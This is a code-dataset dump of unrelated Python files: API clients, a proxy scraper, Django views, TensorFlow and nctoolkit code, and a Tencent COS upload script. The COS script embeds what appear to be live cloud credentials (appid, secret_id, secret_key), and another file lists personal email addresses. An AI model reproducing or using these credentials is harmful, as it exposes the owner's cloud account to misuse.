urlopen(request).read().decode('utf-8')\n\tmovie = json.loads(response)\n\t\n\tif images:\n\t\turl = settings.URL + '/movies/' + id + '?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tmovie = get_images_movie(movie, json.loads(response))\n\n\treturn movie\n\t\t\n\ndef Show(id, images = False, seasons = False, extended = True):\n\turl = settings.URL + '/shows/' + id + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = urlopen(request).read().decode('utf-8')\n\tshow = json.loads(response)\n\n\tif images:\n\t\turl = settings.URL + '/shows/' + id + '?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tshow = get_images_serie(show, json.loads(response))\n\n\tif seasons:\n\t\tshow['seasons'] = Seasons(id, images, extended)\n\n\treturn show\n\n\ndef Seasons(show_id, images = True, extended = True):\n\turl = settings.URL + '/shows/' + show_id + '/seasons' + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = urlopen(request).read().decode('utf-8')\n\tseasons = json.loads(response)\n\t\n\tif images:\n\t\turl = settings.URL + '/shows/' + show_id + '/seasons?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tseasons = get_images_seasons(seasons, json.loads(response))\n\n\treturn seasons\n\n\ndef Season(show_id, season_number, images = False, episodes = False):\n\tseasons = Seasons(show_id, images)\n\tseason = seasons[season_number]\n\n\tif images:\n\t\turl = settings.URL + '/shows/' + show_id + '/seasons?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tseason = get_images_season(season, json.loads(response))\n\n\tif episodes:\n\t\tseason['episodes'] = []\n\t\tfor i in range(1, season['episode_count'] + 1):\n\t\t\tseason['episodes'].append(Episode(show_id, season_number, i, images))\n\n\treturn season\n\n\ndef Episode(show_id, season_number, episode_number, images = False, extended = True):\n\turl = settings.URL + '/shows/' + show_id + '/seasons/' + str(season_number)+ '/episodes/' + str(episode_number) + ('?extended=full' if extended else None)\n\trequest = Request(url, headers=settings.HEADER)\n\tresponse = urlopen(request).read().decode('utf-8')\n\tepisode = json.loads(response)\n\n\tif images:\n\t\turl = settings.URL + '/shows/' + show_id + '/seasons/' + str(season_number)+ '/' + str(episode_number) + '?extended=images'\n\t\trequest = Request(url, headers=settings.HEADER)\n\t\tresponse = urlopen(request).read().decode('utf-8')\n\t\tepisode = get_images_episode(episode, json.loads(response))\n\n\treturn episode\n","sub_path":"api/model_api.py","file_name":"model_api.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"66658381","text":"#url:http://api.89ip.cn/tqdl.html?api=1&num=9999&port=&address=&isp=\nimport requests\nimport re\nimport string\nimport time\n#content > section > div.container > table > tbody > tr:nth-child(5) > td:nth-child(1)\ndef ip_port(url):\n s = requests.session()\n s.keep_alive = False #防止http连接过多\n response = requests.get(url)\n text = response.text\n data = re.findall('[.\\n]*(.*?)
',text) #[.\\n]* 匹配换行符\n data = data + re.findall('
(.*?)
',text)\n return data\n\nif __name__ == '__main__':\n url = 'http://api.89ip.cn/tqdl.html?api=1&num=9999&port=&address=&isp='\n f = open('D:/test/Code/exercise/reptile/data/reptile3.txt','w')\n data = ip_port(url)\n for line in data:\n print(line)\n f.write(line+'\\n')\n f.close()\n","sub_path":"exercise/reptile/reptile3.py","file_name":"reptile3.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497724092","text":"\"\"\"\n\"\"\"\n\nimport sys\nimport os\n\nimport itertools\nimport random\nimport pickle\n\nimport numpy\nfrom . import LatinSquare\n\nclass COD:\n \"\"\"Crossover Design for sensory evaluations.\n \n Attributes:\n t (int): Total number of products (treatments) to be tested.\n p (int): Number of periods any subject is exposed to.\n r (int): Number of times every treatment is tested.\n s (int): Number of subjects (blocks).\n lambda_ (int): Total number of pairwise comparisons made.\n \n laplacian (numpy.matrix): Laplacian Matrix for the design.\n Equal to (r - lambda)*I + (lambda)*J.\n \n \"\"\"\n def __init__(self, treatments, periods, replicates, pickle_name=None):\n \"\"\"Crossover Design.\n \n Args:\n treatments (int): Total number of products (treatments) to be\n tested.\n periods (int): Number of periods any subject is exposed to.\n replicates (int): Number of periods any subject is exposed to.\n pickle_name (str): String containing the path to a pickle file\n created with the save_result() method.\n \n \"\"\"\n \n # Validate parameters as those of a BIBD.\n # https://en.wikipedia.org/wiki/Block_design\n if not (replicates * treatments) % periods == 0:\n raise ValueError('Parameters must be consistent with \\\ntreatments * replicates = (some_integer) * periods')\n\n elif not (replicates * (periods - 1)) % (treatments - 1) == 0:\n raise ValueError('Parameters must be consistent with \\\nreplicates * (periods - 1) = (some_integer) * (treatments - 1)')\n \n self.t = treatments\n self.p = periods\n self.r = replicates\n self.s = (self.t * self.r) // self.p\n self.num_squares = self.s // self.t\n self.lambda_ = (self.r * (self.p - 1)) // (self.t - 1)\n self.square = LatinSquare(self.t)\n \n self.laplacian = numpy.matrix((self.r - self.lambda_) *\\\n numpy.identity(self.t)\\\n + (self.lambda_) * numpy.ones(self.t))\n \n \n if pickle_name:\n self.pickle_name = pickle_name\n with open(self.pickle_name, 'rb') as pickle_file:\n items = pickle.load(pickle_file)\n if (self.t, self.p, self.r) != items[0]:\n raise ValueError('This file was created for a \\\ndifferent set of parameters: t=%d,p=%d,r=%d' % items[0])\n else:\n perms = items[1]\n self._find_design(perms)\n else:\n self._find_design()\n \n def _make_design(self, saved_perms=None):\n '''\n '''\n cod = []\n values = range(self.t)\n \n if saved_perms is None:\n perms = itertools.permutations(values, self.p)\n self.permutations = random.sample(list(perms), self.num_squares)\n else:\n self.permutations = saved_perms\n \n for perm in self.permutations:\n for row in self.square.square:\n cod.append([row[indx] for indx in perm])\n \n return cod\n \n def _get_incidence_matrix(self, cod):\n '''\n '''\n nrows = len(cod)\n ncols = len(cod[0])\n matrix = [[1 if j in cod[i] else 0 \\\n for j in range(self.t)] for i in range(nrows)]\n \n return numpy.matrix(matrix).T\n \n def _is_balanced(self, cod):\n '''\n '''\n m = self._get_incidence_matrix(cod)\n return (self.laplacian == (m)*(m.T)).all()\n \n def _find_design(self, saved_perms=None):\n '''\n '''\n \n balanced = False\n \n while not balanced:\n cod = self._make_design(saved_perms)\n m = self._get_incidence_matrix(cod)\n balanced = self._is_balanced(cod)\n \n self.cod = cod\n self.incidence_matrix = m\n \n def copy_to_spreadsheet(self, codes=None):\n \"\"\"Copy design as tab-spaced table for pasting into a spreadsheet.\n \n Args:\n codes (iterable of str): Any iterable containing strings as\n the codes for the design.\n \n Returns None. \n \n \"\"\"\n import pyperclip\n \n if codes is None:\n codes = range(self.t)\n elif len(codes) < self.t:\n raise IndexError('The number of codes must be at \\\nleast as big as the number of treatments in the design.')\n \n to_copy = ''\n for row in self.cod:\n to_copy += '\\t'.join([str(codes[i]) for i in row]) + '\\n'\n \n \n pyperclip.copy(to_copy)\n \n return None\n \n def __str__(self):\n s = ''\n for row in self.cod:\n s += '\\t'.join(row) + '\\n'\n \n return s\n \n def save_result(self, filename):\n \"\"\"Saves the current found permutation to a pickle file.\n \n Args:\n filename (str): Filename or path.\n \n Returns None.\n \n \"\"\"\n \n with open(filename, 'wb') as pickle_file:\n pickle.dump(((self.t, self.p, self.r), self.permutations),\n pickle_file)\n \n return None\n \n\n \ndef main():\n # design = COD(11, 6, 150)\n design = COD(9, 6, 96)\n # design = COD(5, 4, 16)\n # design = COD(5, 3, 12)\n print(design.r)\n print(design.lambda_)\n print(design.s)\n print(design.num_squares)\n print(design.laplacian)\n print(design.cod)\n print(design.incidence_matrix)\n print((design.incidence_matrix) * (design.incidence_matrix.T))\n print(design.incidence_matrix.shape)\n pass\n \nif __name__ == '__main__':\n main()","sub_path":"pycrossdes/COD.py","file_name":"COD.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475781618","text":"import requests\n\n\ndef buscar_avartar(usuario):\n \"\"\"\n Buscar o avatar de um usuário no GitHub\n :param usuario: str com o nome do usuário do github\n :return:str com o link do avatar\n \"\"\"\n url = f'https://api.github.com/users/{usuario}'\n resp = requests.get(url)\n return resp.json()['avatar_url']\n\n\nif __name__ == '__main__':\n print(buscar_avartar('rondinelisaad'))\n","sub_path":"libpythonpro/github_apy.py","file_name":"github_apy.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"102485829","text":"from datetime import date, timedelta\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.template import Context\nfrom django.template.loader import render_to_string\n\nfrom hotsite.core.utils import send_email\nfrom hotsite.catalog.models import Software\n\n\nclass Command(BaseCommand):\n title = 'Process Emails'\n help = 'Sends emails'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n instances = []\n provider_pos = 0\n template_name = 'panel/mail.html'\n\n today_str = date.today().strftime('%d/%m/%Y')\n yesterday = date.today() - timedelta(days=1)\n\n softwares_updated = Software.get_updated(date=yesterday)\n\n for instance in softwares_updated:\n if len(instances) == 0:\n instances.append({\n 'provider': instance.provider.name,\n 'softwares': []\n })\n\n last_provider_id = instance.provider.id\n\n if last_provider_id == instance.provider.id:\n instances[provider_pos]['softwares'].append({\n 'name': instance.name,\n 'version_stable': instance.version_stable\n })\n\n else:\n instances.append({\n 'provider': instance.provider.name,\n 'softwares': [{\n 'name': instance.name,\n 'version_stable': instance.version_stable\n }, ]\n })\n\n provider_pos += 1\n last_provider_id = instance.provider.id\n\n context = {\n 'instances': instances,\n 'date': today_str\n }\n\n send_email(\n context,\n ['grp-ctis@ifs.edu.br', 'raphael.fontes@ifs.edu.br'],\n f'Resumo de Alerta de Segurança - {today_str}',\n template_name\n )\n\n self.stdout.write(self.style.SUCCESS('Successfully emails sent!'))\n","sub_path":"hotsite/hotsite/core/management/commands/process_email.py","file_name":"process_email.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74166709","text":"import unittest\nimport nctoolkit as nc\nnc.options(lazy= True)\nimport pandas as pd\nimport xarray as xr\nimport os\n\n\nclass TestNCO(unittest.TestCase):\n def test_empty(self):\n n = len(nc.session_files())\n self.assertEqual(n, 0)\n\n def test_mean(self):\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.ensemble_mean(vars = \"sst\")\n data.spatial_mean()\n x = data.to_dataframe().sst.values[0].astype(\"float\")\n\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.nco_command(\"ncea -y mean\", ensemble = True)\n data.spatial_mean()\n y = data.to_dataframe().sst.values[0].astype(\"float\")\n\n self.assertEqual(x, y)\n\n def test_mean2(self):\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.mean()\n data.merge_time()\n data.mean()\n data.spatial_mean()\n x = data.to_dataframe().sst.values[0].astype(\"float\")\n\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n data.nco_command(\"ncra -y mean\", ensemble = False)\n\n data.merge_time()\n data.mean()\n data.spatial_mean()\n\n y = data.to_dataframe().sst.values[0].astype(\"float\")\n\n self.assertEqual(x, y)\n\n def test_command_error(self):\n\n data = nc.open_data(nc.create_ensemble(\"data/ensemble\"))\n\n with self.assertRaises(TypeError) as context:\n data.nco_command(1)\n\n with self.assertRaises(ValueError) as context:\n data.nco_command(\"test\")\n with self.assertRaises(ValueError) as context:\n data.nco_command()\n\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"tests/test_nco_command_lazy.py","file_name":"test_nco_command_lazy.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"279541443","text":"s = \"A man, a plan, a canal: Panama\"\n\n\ndef palindrome(s: str) -> bool:\n s = s.lower()\n s_stripped = ''.join(list(filter(lambda x: x.isalnum() == True, s)))\n low = 0\n high = len(s_stripped) - 1\n while low <= high:\n if s_stripped[low] == s_stripped[high]:\n low += 1\n high -= 1\n continue\n else:\n return False\n\n return True\n\n\nprint(palindrome(s))\n\nprint(s)\n","sub_path":"String/Panlidrome.py","file_name":"Panlidrome.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"312578788","text":"import requests\nimport json\nfrom .. import app\nfrom .. import db\nfrom .. import hooks\nfrom .. import models\nfrom .. import queue\nfrom .. import views\nfrom flask import request, jsonify\n\n\ndef register():\n hooks.register('post-saved', reverse_geocode)\n hooks.register('venue-saved', reverse_geocode_venue)\n\n\ndef reverse_geocode(post, args):\n queue.enqueue(do_reverse_geocode_post, post.id)\n\n\ndef reverse_geocode_venue(venue, args):\n queue.enqueue(do_reverse_geocode_venue, venue.id)\n\n\ndef do_reverse_geocode_post(postid):\n post = models.Post.load_by_id(postid)\n if post.location and 'latitude' in post.location \\\n and 'longitude' in post.location:\n adr = do_reverse_geocode(post.location['latitude'],\n post.location['longitude'])\n # copy the dict so that the ORM recognizes\n # that it changed\n post.location = dict(post.location)\n post.location.update(adr)\n db.session.commit()\n\n\ndef do_reverse_geocode_venue(venueid):\n venue = models.Venue.query.get(venueid)\n if venue.location and 'latitude' in venue.location \\\n and 'longitude' in venue.location:\n adr = do_reverse_geocode(venue.location['latitude'],\n venue.location['longitude'])\n # copy the dict so the ORM actually recognizes\n # that it changed\n venue.location = dict(venue.location)\n venue.location.update(adr)\n venue.update_slug(views.geo_name(venue.location))\n db.session.commit()\n\n\ndef do_reverse_geocode(lat, lng):\n def region(adr):\n if adr.get('country_code') == 'us':\n return adr.get('state') or adr.get('county')\n else:\n return adr.get('county') or adr.get('state')\n\n app.logger.debug('reverse geocoding with nominatum')\n r = requests.get('http://nominatim.openstreetmap.org/reverse',\n params={\n 'lat': lat,\n 'lon': lng,\n 'format': 'json'\n })\n r.raise_for_status()\n\n data = json.loads(r.text)\n app.logger.debug('received response %s',\n json.dumps(data, indent=True))\n\n adr = data.get('address', {})\n\n # hat-tip https://gist.github.com/barnabywalters/8318401\n return {\n 'street_address': adr.get('road'),\n 'extended_address': adr.get('suburb'),\n 'locality': (adr.get('hamlet')\n or adr.get('village')\n or adr.get('town')\n or adr.get('city')\n or adr.get('locality')\n or adr.get('suburb')\n or adr.get('county')),\n 'region': region(adr),\n 'country_name': adr.get('country'),\n 'postal_code': adr.get('postcode'),\n 'country_code': adr.get('country_code'),\n }\n\n\n@app.route('/services/geocode')\ndef reverse_geocode_service():\n lat = request.args.get('latitude')\n lng = request.args.get('longitude')\n return jsonify(do_reverse_geocode(lat, lng))\n","sub_path":"redwind/plugins/locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"34477434","text":"import os\nimport glob\nfrom pexpect import *\n\nc = spawn('bash')\nc.expect('\\$')\ncwd = os.getcwd()\nfor dir in glob.glob(cwd + os.sep + '*'):\n if os.path.isfile(dir):\n (path, name) = os.path.split(dir)\n print (dir, path, name)\n c.sendline('ln -s %s ../testdir/%s' % (dir, name))\n c.expect('\\$')\n","sub_path":"fusion_sensor_unit_test/TestLibs/ln.py","file_name":"ln.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"644809147","text":"import Produce_Model_Data\nimport tensorflow as tf\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n\nX_train, X_test, X_dev, y_train, y_test, y_dev, full_dataset, submission_features = Produce_Model_Data.produce_train_test_dev()\n\n\ndef y_logger(y):\n out = np.log(y)\n out[(out == np.inf) | (out == -np.inf)] = 0\n return out\n\ny_train, y_test, y_dev = y_logger(y_train), y_logger(y_test), y_logger(y_dev)\n\n\n'''\nNN structure\ninput -> RELU -> RELU\n\nmake data into correct shape.\nX has observations stacked vertically. Rows = features, columns = observations\nThis is the current format of the dataset\n'''\n\ndef create_placeholders():\n\n X = tf.placeholder(tf.float32, [13, None], name=\"X\")\n Y = tf.placeholder(tf.float32, [1, None], name=\"Y\")\n\n return X, Y\n\ndef initialise_parameters():\n W1 = tf.get_variable(\"W1\", [10, 13], initializer=tf.contrib.layers.xavier_initializer(seed=1))\n b1 = tf.get_variable(\"b1\", [10, 1], initializer=tf.zeros_initializer())\n W2 = tf.get_variable(\"W2\", [5, 10], initializer=tf.contrib.layers.xavier_initializer(seed=1))\n b2 = tf.get_variable(\"b2\", [5, 1], initializer=tf.zeros_initializer())\n W3 = tf.get_variable(\"W3\", [1, 5], initializer=tf.contrib.layers.xavier_initializer(seed=1))\n b3 = tf.get_variable(\"b3\", [1, 1], initializer=tf.zeros_initializer())\n\n parameters = {\n \"W1\": W1\n , \"b1\": b1\n , \"W2\": W2\n , \"b2\": b2\n , \"W3\": W3\n , \"b3\": b3\n }\n\n return parameters\n\ndef forward_propagation(X, parameters):\n\n # Retrieve the parameters from the dictionary \"parameters\"\n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n\n\n Z1 = tf.add(tf.matmul(W1, X), b1)\n A1 = tf.nn.relu(Z1)\n Z2 = tf.add(tf.matmul(W2, A1), b2)\n A2 = tf.nn.relu(Z2)\n Z3 = tf.add(tf.matmul(W3, A2), b3)\n A3 = tf.nn.relu(Z3)\n\n return A3\n\n\n# COST FUNCTION\ndef compute_cost(y_hat, y):\n\n cost = tf.reduce_mean(tf.square(y_hat - y))\n\n return cost\n\ndef model(X_train\n ,y_train\n ,X_dev\n ,y_dev\n ,test_data\n ,learning_rate = 0.000001\n ,num_epochs = 1000\n ,print_cost = True\n ):\n\n tf.reset_default_graph()\n\n costs = [] # To keep track of the cost\n X, Y = create_placeholders()\n\n # Initialize parameters\n parameters = initialise_parameters()\n\n y_hat = forward_propagation(X, parameters)\n\n cost = compute_cost(y_hat, Y)\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost)\n # Alternative\n #optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n # Run the initialization\n sess.run(init)\n\n\n # Do the training loop\n for epoch in range(num_epochs):\n _, epoch_cost = sess.run([optimizer, cost], feed_dict={X: X_train, Y: y_train})\n costs.append(epoch_cost)\n\n\n if print_cost == True and epoch % 100 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, epoch_cost))\n if print_cost == True and epoch % 5 == 0:\n costs.append(epoch_cost)\n\n # get the parameters out of the model\n parameters = sess.run(parameters)\n print(\"Parameters have been trained!\")\n\n # make predictions for manual inspection\n train_predictions = sess.run(y_hat, feed_dict={X:X_train})\n dev_predictions = sess.run(y_hat, feed_dict={X:X_dev})\n test_predictions = sess.run(y_hat, feed_dict={X:test_data})\n\n predictions = {\n \"train_predictions\": train_predictions\n ,\"dev_predictions\": dev_predictions\n ,\"test_predictions\": test_predictions\n }\n\n dev_cost = sess.run(cost, feed_dict={X:X_dev, Y:y_dev})\n\n\n print(\"Train MSE:\", costs[-1])\n print(\"Test MSE:\", dev_cost)\n\n plt.plot(costs)\n\n return parameters, predictions\n\n\n\nparameters, predictions = model(\n X_train\n , y_train\n , X_dev\n , y_dev\n ,submission_features\n , learning_rate=0.001\n , num_epochs=1500\n , print_cost=True\n)\n\n\nexpon_predictions = {k: np.exp(v) for k,v in predictions.items()}\nexpon_y_train = np.exp(y_train)\nexpon_y_dev = np.exp(y_dev)\n\ndef mse(y_hat, y):\n mse = np.mean(np.square(y_hat - y))\n return mse\n\ndef rmsle(y, y_hat):\n return np.sqrt(np.mean(np.power(np.log1p(y)-np.log1p(y_hat), 2)))\n\nrmsle(expon_predictions[\"train_predictions\"], expon_y_train)\nrmsle(expon_predictions[\"dev_predictions\"], expon_y_dev)\n\ntest_predictions = expon_predictions[\"test_predictions\"]\n'''\n# FOR WRITING\nimport Data_Import\nimport pandas as pd\n_, _, _, _, submission_data, _ = Data_Import.get_data()\n\noutput = submission_data\noutput.sales = test_predictions.T.reshape(test_predictions.T.shape[0],)\n\noutput.to_csv(\"C://Users/robwh/PycharmProjects/EAN_Hotel_Sales_Prediction/submission_scored.csv\", encoding='utf-8', index=False)\n'''","sub_path":"TensorFlow_Models.py","file_name":"TensorFlow_Models.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"476429418","text":"# -*- coding: utf-8 -*-\n# auther: Joe wen\n\nimport os, sys, time, re, json, urllib\nfrom datetime import datetime, timedelta\nfrom qcloud_cos import CosClient, UploadFileRequest, StatFileRequest, ListFolderRequest, DelFileRequest,DelFolderRequest, CreateFolderRequest\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nappid = \"1251180962\"\nsecret_id = u'AKID9Bg4HI4kBSXQ7ev85vZ0JTSFrHVXq1Sm'\nsecret_key = u'HOJ2ZuujLlySnw8PbdT9duyqY9YmoeIw'\nregion_info = 'gz'\nbucket = u'backup'\n# remotepath = u'/user.txt'\n# localpath = u'/user.txt'\n# remotefolder = '/abab/'\n#localpath = u'/Users/joe/Documents/tutory_python/03/'\n\nallfolder_name = []\nallfile_name = []\nfilepath = \"/Users/joe/Downloads/test\"\nfilepath_len = len(filepath)\n\ndef Screendir(filepath):\n for alldir in os.listdir(filepath):\n child = os.path.join(filepath, alldir)\n if os.path.isdir(child):\n allfolder_name.append(child)\n Screendir(child)\n else:\n allfile_name.append(child)\n return allfolder_name, allfile_name\n # print(child.decode('utf8'))\n\ndef Uploadfile(cos_client,bucket,remotepath,localpath):\n request = UploadFileRequest(bucket, remotepath, localpath)\n request.set_insert_only(0) #0是允许覆盖 1是不允许\n upload_file_ret = cos_client.upload_file(request)\n print(upload_file_ret['message'])\n if upload_file_ret['message'] == u'SUCCESS':\n print(localpath.encode('utf8') + '上传成功')\n elif upload_file_ret['message'] == u'ERROR_CMD_BUCKET_NOTEXIST':\n print('bucket错误,请重新检查bucker名称')\n elif upload_file_ret['message'] == u'ERROR_PROXY_AUTH_APPID':\n print('APPID错误')\n elif upload_file_ret['message'] == u'PROXY_AUTH_SECRETID_NOEXIST':\n print('secret_id错误')\n elif upload_file_ret['message'] == u'ERROR_PROXY_AUTH_FAILED':\n print('secret_key错误')\n else:\n print('other error')\n\ndef Createfolder(cos_client,bucket,remotefolder):\n request = CreateFolderRequest(bucket,remotefolder)\n create_folder_ret = cos_client.create_folder(request)\n print(repr(create_folder_ret['message']))\n if create_folder_ret['message'] == u'SUCCESS':\n print(remotefolder + '创建目录成功')\n elif create_folder_ret['message'] == u'ERROR_CMD_COS_PATH_CONFLICT':\n print('目录已存在')\n else:\n print('创建失败')\n\n\n\n\nScreendir(filepath)\n\n#print(allfolder_name, allfile_name)\n#folder_len = len(allfolder_name) -1\n\n\ncos_client = CosClient(int(appid), secret_id, secret_key, region=region_info)\n\nfor remotefolder in allfolder_name:\n folder_abs = os.path.join(filepath,remotefolder)\n remotefolder = remotefolder[filepath_len:] + '/'\n if folder_abs in allfolder_name:\n Createfolder(cos_client, bucket, unicode(remotefolder))\n\nfor remotepath in allfile_name:\n localpath = remotepath\n file_abs = os.path.join(filepath,remotepath)\n remotepath = remotepath[filepath_len:]\n\n if file_abs in allfile_name:\n Uploadfile(cos_client,bucket,unicode(remotepath),unicode(localpath))","sub_path":"02/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221630857","text":"import re\n\nfrom django.shortcuts import render, HttpResponseRedirect, Http404\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\n\n\nfrom .forms import LoginForm, RegistrationForm, UserAddressForm\nfrom .models import EmailConfirmed\n# Create your views here.\n\n\ndef logout_view(request):\n\tprint (\"logging out\")\n\tlogout(request)\n\tmessages.success(request, \"Successfully Logged out. Feel free to
login again.\" %(reverse(\"auth_login\")), extra_tags='safe, abc')\n\tmessages.warning(request, \"There's a warning.\")\n\tmessages.error(request, \"There's an error.\")\n\treturn HttpResponseRedirect('%s'%(reverse(\"auth_login\")))\n\ndef login_view(request):\n\tform = LoginForm(request.POST or None)\n\tbtn = \"connection\"\n\terror = False\n\ttitre = \"Connection\"\n\t\n\tif form.is_valid():\n\t\tusername = form.cleaned_data['username']\n\t\tpassword = form.cleaned_data['password']\n\t\tuser = authenticate(username=username, password=password)\n\t\tlogin(request, user)\n\t\tmessages.success(request, \"Successfully Logged In. Welcome Back!\")\n\t\terror = True\n\t\treturn HttpResponseRedirect(\"/\")\n\t\n\tconect = False\n\t\n\tcontext = {\n\t\t\"form\": form,\n\t\t\"conect\": conect,\n\t\t\"submit_btn\": btn,\n\t\t\"titre\": titre,\n\t}\n\treturn render(request, \"form.html\", context)\n\n\ndef registration_view(request):\n\tform = RegistrationForm(request.POST or None)\n\tbtn = \"s'enregistrer\"\n\ttitre = \"Enregistrement\"\n\t\n\tif form.is_valid():\n\t\tnew_user = form.save(commit=False)\n\t\tnew_user.save()\n\t\treturn HttpResponseRedirect(\"/\")\n\t\t\n\tconect = True\n\t\n\tcontext = {\n\t\t \"form\": form,\n\t\t \"conect\": conect,\n\t\t \"submit_btn\": btn,\n\t\t \"titre\": titre,\n\t}\n\treturn render(request, \"form.html\", context)\n\n\nSHA1_RE = re.compile('^[a-f0-9]{40}$')\n\ndef activation_view(request, activation_key):\n\tif SHA1_RE.search(activation_key):\n\t\tprint (\"activation key is real\")\n\t\ttry:\n\t\t\tinstance = EmailConfirmed.objects.get(activation_key=activation_key)\n\t\texcept EmailConfirmed.DoesNotExist:\n\t\t\tinstance = None\n\t\t\tmessages.success(request, \"There was an error with your request.\")\n\t\t\treturn HttpResponseRedirect(\"/\")\n\t\tif instance is not None and not instance.confirmed:\n\t\t\tpage_message = \"Confirmation Successful! Welcome.\"\n\t\t\tinstance.confirmed = True\n\t\t\tinstance.activation_key = \"Confirmed\"\n\t\t\tinstance.save()\n\t\t\tmessages.success(request, \"Successfully Confirmed! Please login.\")\n\t\telif instance is not None and instance.confirmed:\n\t\t\tpage_message = \"Already Confirmed\"\n\t\t\tmessages.success(request, \"Already Confirmed.\")\n\t\telse:\n\t\t\tpage_message = \"\"\n\n\t\tcontext = {\"page_message\": page_message}\n\t\treturn render(request, \"accounts/activation_complete.html\", context)\n\telse:\n\t\traise Http404\n\n\n\n\ndef add_user_address(request):\n\tprint (request.GET)\n\tform = UserAddressForm(request.POST or None)\n\tif request.method == \"POST\":\n\t\tif form.is_valid():\n\t\t\tnew_address = form.save(commit=False)\n\t\t\tnew_address.user = request.user\n\t\t\tnew_address.save()\n\t\t\treturn HttpResponseRedirect(\"/commander/\")\n\t\n\tsubmit_btn = \"Sauvegarder addresse\"\n\tform_title = \"Ajouter une nouvelle Adresse\"\n\treturn render(request, \"form_adres.html\", \n\t\t{\"form\": form,\n\t\t\"submit_btn\": submit_btn,\n\t\t\"form_title\": form_title,\n\t\t})\t","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"319736311","text":"from __future__ import print_function\n\nimport os\nfrom flask import Flask, json, request, redirect, render_template\nimport spotipy.oauth2 as oauth2\nimport spotipy\n\nSPOTIFY_SCOPES = ','.join([\n 'playlist-read-collaborative',\n 'user-read-currently-playing',\n 'user-modify-playback-state',\n 'user-read-playback-state',\n 'user-library-read',\n 'streaming',\n 'user-top-read',\n 'user-read-recently-played'\n])\n\napp = Flask(__name__)\n\nsp_oauth = oauth2.SpotifyOAuth(\n os.getenv('SPOTIFY_CLIENT_ID'),\n os.getenv('SPOTIFY_CLIENT_SECRET'),\n os.getenv('SPOTIFY_REDIRECT_URI'),\n scope=SPOTIFY_SCOPES,\n cache_path=\".cache-\" + os.getenv('SPOTIFY_USERNAME'))\n\nspotify = None\n\n\ndef main():\n global spotify\n\n spotify = spotipy.Spotify(auth=get_token())\n\n app.run('0.0.0.0')\n\n\ndef get_token():\n try:\n return open('spotify.token').read()\n except FileNotFoundError:\n return None\n\n\ndef set_token(token):\n open('spotify.token').write(token)\n\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n\n@app.route('/auth/login')\ndef auth_login():\n token = sp_oauth.get_cached_token()\n\n if not token:\n return redirect(sp_oauth.get_authorize_url())\n\n return redirect('/')\n\n\n@app.route('/auth/callback')\ndef auth_callback():\n code = sp_oauth.parse_response_code(request.url)\n token_info = sp_oauth.get_access_token(code)\n\n # Auth'ed API request\n print('token info %s' % token_info['access_token'])\n\n token = token_info['access_token']\n\n if token:\n set_token(token)\n\n return redirect('/')\n\n return redirect('/auth/login')\n\n\n@app.route('/test')\ndef test():\n # return json.dumps(sp_client.me())\n return json.dumps(spotify._get('me/player'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"36399929","text":"#!/usr/bin/env 